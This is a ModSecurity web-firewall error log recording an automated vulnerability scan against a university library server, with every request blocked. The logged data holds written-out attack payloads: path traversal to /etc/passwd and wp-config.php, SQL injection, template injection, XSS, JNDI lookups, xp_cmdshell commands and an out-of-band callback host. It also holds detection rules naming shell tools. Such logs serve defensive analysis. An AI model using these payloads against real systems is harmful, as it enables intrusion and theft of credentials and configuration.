[Tue Aug 29 11:45:06.392029 2023] [:error] [pid 2169] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAh5RWIAAAA3"]
[Tue Aug 29 11:45:07.411720 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAhISRoAAAAH"]
[Tue Aug 29 11:45:08.384533 2023] [:error] [pid 2142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO131MCo-f0AAAheaX0AAAAY"]
[Tue Aug 29 11:45:08.394340 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO131MCo-f0AAAg-pN0AAAAR"]
[Tue Aug 29 11:45:09.361157 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO131cCo-f0AAAhvjVoAAAAs"]
[Tue Aug 29 11:45:10.357565 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAhkLfAAAAAh"]
[Tue Aug 29 11:45:10.405390 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO131sCo-f0AAAdQ3ygAAAAV"]
[Tue Aug 29 11:45:11.448437 2023] [:error] [pid 2142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAheaYEAAAAY"]
[Tue Aug 29 11:45:12.373670 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAh7ws8AAAA5"]
[Tue Aug 29 11:45:13.374249 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAfg77gAAAAe"]
[Tue Aug 29 11:45:15.361481 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAhpwPkAAAAm"]
[Tue Aug 29 11:45:16.387501 2023] [:error] [pid 2164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAh0rU8AAAAy"]
[Tue Aug 29 11:45:17.394765 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAfiYuEAAAAg"]
[Tue Aug 29 11:45:17.407010 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAhgoHIAAAAb"]
[Tue Aug 29 11:45:19.369211 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAgzyT4AAAAF"]
[Tue Aug 29 11:45:20.374311 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAhzvakAAAAx"]
[Tue Aug 29 11:45:23.361675 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAfSWjgAAAAB"]
[Tue Aug 29 11:45:23.390596 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1348Co-f0AAAh7wt4AAAA5"]
[Tue Aug 29 11:45:24.369697 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAhT3xcAAAAD"]
[Tue Aug 29 11:45:24.414337 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135MCo-f0AAAfbkxUAAAAZ"]
[Tue Aug 29 11:45:25.361193 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAcsLWYAAAAE"]
[Tue Aug 29 11:45:25.377470 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAhzvbMAAAAx"]
[Tue Aug 29 11:45:25.412619 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135cCo-f0AAAgzyUUAAAAF"]
[Tue Aug 29 11:45:27.351343 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAhuiyMAAAAr"]
[Tue Aug 29 11:45:28.413647 2023] [:error] [pid 2108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAg8a9cAAAAK"]
[Tue Aug 29 11:45:29.411248 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAgzyU4AAAAF"]
[Tue Aug 29 11:45:30.385482 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAfEB2IAAAAO"]
[Tue Aug 29 11:45:30.423232 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO136sCo-f0AAAfiYvwAAAAg"]
[Tue Aug 29 11:45:35.408404 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAhlz6EAAAAi"]
[Tue Aug 29 11:45:36.616291 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAib5sMAAAAA"]
[Tue Aug 29 11:45:43.539000 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gxguj13z3jujdj.oast.site found within TX:1: cjmnbitjmimt14dgn26gxguj13z3jujdj.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAib5twAAAAA"]
[Tue Aug 29 11:45:47.573679 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAhui1cAAAAr"]
[Tue Aug 29 11:45:48.668393 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAi0JGwAAAAK"]
[Tue Aug 29 11:45:48.990331 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAi2x@YAAAAN"]
[Tue Aug 29 11:45:49.385648 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-cCo-f0AAAdxUnEAAAAC"]
